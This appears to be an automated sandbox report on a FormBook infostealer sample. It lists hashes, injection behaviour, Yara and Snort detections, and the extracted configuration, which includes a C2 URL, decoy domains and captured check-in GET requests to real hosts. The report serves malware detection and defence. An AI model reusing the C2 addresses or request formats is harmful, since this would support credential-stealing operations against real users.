Loading ...

Play interactive tourEdit tour

Windows Analysis Report stage4.exe

Overview

General Information

Sample Name:stage4.exe
Analysis ID:526334
MD5:17032a31243253b4fefeb5c6a9604c1f
SHA1:c6b4a5a935594c61293d8d26c2b891f4c4c02bec
SHA256:84eca147b83cc4116ebb6c34dbe60f7231c676f17152cb376d8efb913d534723
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
PE file has a writeable .text section
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • stage4.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\stage4.exe" MD5: 17032A31243253B4FEFEB5C6A9604C1F)
    • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • explorer.exe (PID: 5700 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cscript.exe (PID: 6156 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.mgav26.xyz/n8rn/"], "decoy": ["jlvip1066.com", "gconsultingfirm.com", "foundergomwef.xyz", "bredaslo.com", "ethereumpets.com", "buddymerrillmusic.com", "archdeylemmergay.com", "particulares-es.icu", "gb2022-club.com", "babypasal.com", "mlikew.com", "mskindi.com", "securewalletvalidate.com", "billstrasse24.com", "ritebet388.com", "nuhive.net", "nekomediphile.com", "jaynelsonphotog.com", "writerpilotpublishing.store", "taquerialoteria.com", "feetlover.online", "buychryslers.com", "duyol.com", "theeppunday.com", "slayfearlessly.com", "padelthiene.com", "falcongroupmanagement.com", "security-paiemet.com", "disfagiaresidencias.com", "ragworkhouse.com", "smplkindness.com", "dartsearchengine.com", "rapibest.com", "lab-design.online", "soflovrlnd.com", "pandawan.club", "purifybrush.com", "grantopwincup.website", "zenholisticstores.com", "nomarcapital.com", "thoughtultracruel.quest", "excellentdefence.com", "phillystore.net", "egregore.club", "waysgaming.com", "boliden-ab.com", "faxedfumnook.com", "ecobook.club", "ff4c75x4e.xyz", "connect01.com", "monascake.xyz", "balaga-vacances.com", "prill.quest", "princessbuilt.com", "islandresiliency.com", "dimcreadev.tech", "bspcanadaconnects.com", "hotgurlmarket.com", "spendbrasiltimebest.com", "newelectricways.com", "counterpokemon.com", "beyerenterprisestreeservice.com", "phorganicfoods.com", "hermespros.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x7608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x7992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x136a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x137a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1391f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x83aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1240c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19c4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.stage4.exe.1200000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.stage4.exe.1200000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.stage4.exe.1200000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.mgav26.xyz/n8rn/"], "decoy": ["jlvip1066.com", "gconsultingfirm.com", "foundergomwef.xyz", "bredaslo.com", "ethereumpets.com", "buddymerrillmusic.com", "archdeylemmergay.com", "particulares-es.icu", "gb2022-club.com", "babypasal.com", "mlikew.com", "mskindi.com", "securewalletvalidate.com", "billstrasse24.com", "ritebet388.com", "nuhive.net", "nekomediphile.com", "jaynelsonphotog.com", "writerpilotpublishing.store", "taquerialoteria.com", "feetlover.online", "buychryslers.com", "duyol.com", "theeppunday.com", "slayfearlessly.com", "padelthiene.com", "falcongroupmanagement.com", "security-paiemet.com", "disfagiaresidencias.com", "ragworkhouse.com", "smplkindness.com", "dartsearchengine.com", "rapibest.com", "lab-design.online", "soflovrlnd.com", "pandawan.club", "purifybrush.com", "grantopwincup.website", "zenholisticstores.com", "nomarcapital.com", "thoughtultracruel.quest", "excellentdefence.com", "phillystore.net", "egregore.club", "waysgaming.com", "boliden-ab.com", "faxedfumnook.com", "ecobook.club", "ff4c75x4e.xyz", "connect01.com", "monascake.xyz", "balaga-vacances.com", "prill.quest", "princessbuilt.com", "islandresiliency.com", "dimcreadev.tech", "bspcanadaconnects.com", "hotgurlmarket.com", "spendbrasiltimebest.com", "newelectricways.com", "counterpokemon.com", "beyerenterprisestreeservice.com", "phorganicfoods.com", "hermespros.com"]}
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
        Antivirus detection for URL or domainShow sources
        Source: www.mgav26.xyz/n8rn/Avira URL Cloud: Label: phishing
        Source: http://www.egregore.club/n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoPAvira URL Cloud: Label: phishing
        Machine Learning detection for sampleShow sources
        Source: stage4.exeJoe Sandbox ML: detected
        Source: stage4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: stage4.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: cscript.pdbUGP source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, cscript.exe, 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, cscript.exe
        Source: Binary string: cscript.pdb source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp
        Source: C:\Users\user\Desktop\stage4.exeCode function: 4x nop then pop ebx0_2_01206AB4
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx22_2_010D6AB5

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49833 -> 109.234.160.63:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49833 -> 109.234.160.63:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49833 -> 109.234.160.63:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49839 -> 168.119.175.0:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49839 -> 168.119.175.0:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49839 -> 168.119.175.0:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49843 -> 192.200.108.3:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49843 -> 192.200.108.3:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49843 -> 192.200.108.3:80
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeNetwork Connect: 88.99.22.5 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 109.234.160.63 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.theeppunday.com
        Source: C:\Windows\explorer.exeDomain query: www.egregore.club
        Source: C:\Windows\explorer.exeDomain query: www.dartsearchengine.com
        Source: C:\Windows\explorer.exeDomain query: www.feetlover.online
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
        Performs DNS queries to domains with low reputationShow sources
        Source: DNS query: www.mgav26.xyz
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: www.mgav26.xyz/n8rn/
        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
        Source: Joe Sandbox ViewASN Name: O2SWITCHFR O2SWITCHFR
        Source: global trafficHTTP traffic detected: GET /n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.feetlover.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8rn/?DFNPQJ=h1fp3Hda9mAZkqRDMBzhuAsSSpfRTgMN3yh/hpwpAz6PQ27xv5wLBHD9XtakgWKnfsj5&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.dartsearchengine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.egregore.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8rn/?DFNPQJ=NdSdCS1so+jBOhKbX6Hl5r/uB2055iwTMCcKjDuiSwVFzL3wqZseOva8MEOaJLNdbnoX&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.gconsultingfirm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 22 Nov 2021 13:42:26 GMTContent-Type: text/htmlContent-Length: 275ETag: "6193c8c9-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 22 Nov 2021 13:43:07 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be761-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
        Source: explorer.exe, 0000000F.00000000.364635706.00000000086E8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: explorer.exe, 0000000F.00000003.349908622.0000000008844000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.366683920.0000000008844000.00000004.00000001.sdmpString found in binary or memory: http://crl.v
        Source: explorer.exe, 0000000F.00000000.317525640.0000000002BCB000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cm/x
        Source: unknownDNS traffic detected: queries for: www.feetlover.online
        Source: global trafficHTTP traffic detected: GET /n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.feetlover.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8rn/?DFNPQJ=h1fp3Hda9mAZkqRDMBzhuAsSSpfRTgMN3yh/hpwpAz6PQ27xv5wLBHD9XtakgWKnfsj5&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.dartsearchengine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.egregore.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8rn/?DFNPQJ=NdSdCS1so+jBOhKbX6Hl5r/uB2055iwTMCcKjDuiSwVFzL3wqZseOva8MEOaJLNdbnoX&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.gconsultingfirm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: stage4.exe, 00000000.00000002.395798029.0000000000E9A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        PE file has a writeable .text sectionShow sources
        Source: stage4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: stage4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
